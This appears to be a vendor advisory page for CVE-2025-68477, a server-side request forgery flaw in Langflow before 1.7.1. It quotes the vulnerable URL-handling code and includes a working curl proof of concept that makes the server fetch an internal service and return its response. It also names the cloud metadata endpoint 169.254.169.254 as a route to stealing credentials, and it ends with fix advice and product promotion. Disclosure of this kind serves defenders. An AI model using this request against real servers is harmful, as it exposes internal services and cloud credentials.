CVE-2025-68477 is a high-severity server-side request forgery (SSRF) vulnerability in langflow (pip), affecting versions < 1.7.1. It is fixed in 1.7.1.
Vulnerability Overview Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result. Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible, accessing internal resources from the server’s network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks. Vulnerable Code When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI. https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L349-L359 python @router.post("/run/{flowidorname}", responsemodel=None, responsemodelexcludenone=True) async def simplifiedrunflow( , backgroundtasks: BackgroundTasks, flow: Annotated[FlowRead | None, Depends(getflowbyidorendpointname)], inputrequest: SimplifiedAPIRequest | None = None, stream: bool = False, apikeyuser: Annotated[UserRead, Depends(apikeysecurity)], context: dict | None = None, httprequest: Request, ): https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L573-L588 bash @router.post( "/run/advanced/{flowidorname}", responsemodel=RunResponse, responsemodelexcludenone=True, ) async def experimentalrunflow( , session: DbSession, flow: Annotated[Flow, Depends(getflowbyidorendpointname)], inputs: list[InputValueRequest] | None = None, outputs: list[str] | None = None, tweaks: Annotated[Tweaks | None, Body(embed=True)] = None, stream: Annotated[bool, Body(embed=True)] = False, sessionid: Annotated[None | str, Body(embed=True)] = None, apikeyuser: Annotated[UserRead, Depends(apikeysecurity)], ) -> RunResponse: Normalization/validation stage: It only checks that the URL is non-empty and well-formed. No blocking of private networks, localhost, or IMDS. https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/apirequest.py#L280-L289 python def normalizeurl(self, url: str) -> str: """Normalize URL by adding https:// if no protocol is specified.""" if not url or not isinstance(url, str): msg = "URL cannot be empty" raise ValueError(msg) url = url.strip() if url.startswith(("http://", "https://")): return url return f"https://{url}" https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/apirequest.py#L433-L438 python url = self.normalizeurl(url) # Validate URL if not validators.url(url): msg = f"Invalid URL provided: {url}" raise ValueError(msg) On the server side, it sends a request to an arbitrary URL using httpx.AsyncClient and exposes the response body as metadata["result"]. https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/apirequest.py#L312-L322 python try: # Prepare request parameters requestparams = { "method": method, "url": url, "headers": headers, "json": processedbody, "timeout": timeout, "followredirects": followredirects, } response = await client.request(requestparams) https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/apirequest.py#L335-L340 python # Base metadata metadata = { "source": url, "statuscode": response.statuscode, "responseheaders": responseheaders, } https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/apirequest.py#L364-L379 python # Handle response content if isbinary: result = response.content else: try: result = response.json() except json.JSONDecodeError: self.log("Failed to decode JSON response") result = response.text.encode("utf-8") metadata["result"] = result if includehttpxmetadata: metadata.update({"headers": headers}) return Data(data=metadata) PoC PoC Description I launched a Langflow server using the latest langflowai/langflow:latest Docker container, and a separate container internal-api that exposes an internal-only endpoint /internal on port 8000. Both containers were attached to the same user-defined network (ssrf-net), allowing communication by name or via the IP 172.18.0.3. I added an API Request node to a Langflow flow and set the URL to the internal service (http://172.18.0.3:8000/internal). Then I invoked /api/v1/run/advanced/<FLOWID> with an API key to perform SSRF. The response returned the internal service’s body in the result field, confirming non-blind SSRF. PoC** Langflow Setting <img width="1917" height="940" alt="image" src="https://github.com/user-attachments/assets/96b0d770-b260-440f-9205-1583c108e12f" /> Exploit bash curl -s -X POST 'http://localhost:7860/api/v1/run/advanced/0b7f7713-d88c-4f92-bcf8-0dafe250ea9d' \ -H 'Content-Type: application/json' \ -H 'x-api-key: sk-HHc93OjH4epEhfWrweP1IwpooJ3ZZnYOu-HgqJV4M' \ --data-raw '{ "inputs":[{"components":[],"inputvalue":""}], "outputs":["Chat Output"], "tweaks":{"API Request":{"urlinput":"http://172.18.0.3:8000/internal","includehttpxmetadata":false}}, "stream":false }' | jq -r '.outputs[0].outputs[0].results.message.text | sub("^json\\n";"") | sub("\\n$";"") | fromjson | .result' <img width="1918" height="1029" alt="image" src="https://github.com/user-attachments/assets/4883029f-bd56-4c23-b5a3-6f8a84dbcce1" /> Impact Scanning internal assets and data exfiltration: Attackers can access internal administrative HTTP endpoints, proxies, metrics dashboards, and management consoles to obtain sensitive information (versions, tokens, configurations). Access to metadata services: In cloud environments, attackers can use 169.254.169.254, etc., to steal instance metadata and credentials. Foothold for attacking internal services: Can forge requests by abusing inter-service trust and become the starting point of an SSRF→RCE chain (e.g., invoking an internal admin API). Non-blind: Because the response body is returned to the client, attackers can immediately view and exploit the collected data. Risk in multi-tenant environments: Bypassing tenant boundaries can cause cross-leakage of internal network information, resulting in high impact. Even in single-tenant setups, the risk remains high depending on internal network policies.
Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.
CVE-2025-68477 has a CVSS score of 7.7 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment.
A fixed version is available (1.7.1). Upgrading removes the vulnerable code path.
pip
langflow (< 1.7.1)langflow → 1.7.1 (pip)Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter instead of chasing every advisory.
Kodem's runtime-powered SCA identifies whether CVE-2025-68477 is reachable in your applications. Explore open-source security for your team.
See if CVE-2025-68477 is reachable in your applications. Get a demo
Upgrade langflow to 1.7.1 or later to resolve this vulnerability.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
CVE-2025-68477 is a high-severity server-side request forgery (SSRF) vulnerability in langflow (pip), affecting versions < 1.7.1. It is fixed in 1.7.1. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
CVE-2025-68477 has a CVSS score of 7.7 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
langflow (pip) versions < 1.7.1 is affected.
Yes. CVE-2025-68477 is fixed in 1.7.1. Upgrade to this version or later.
Whether CVE-2025-68477 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
Upgrade langflow to 1.7.1 or later.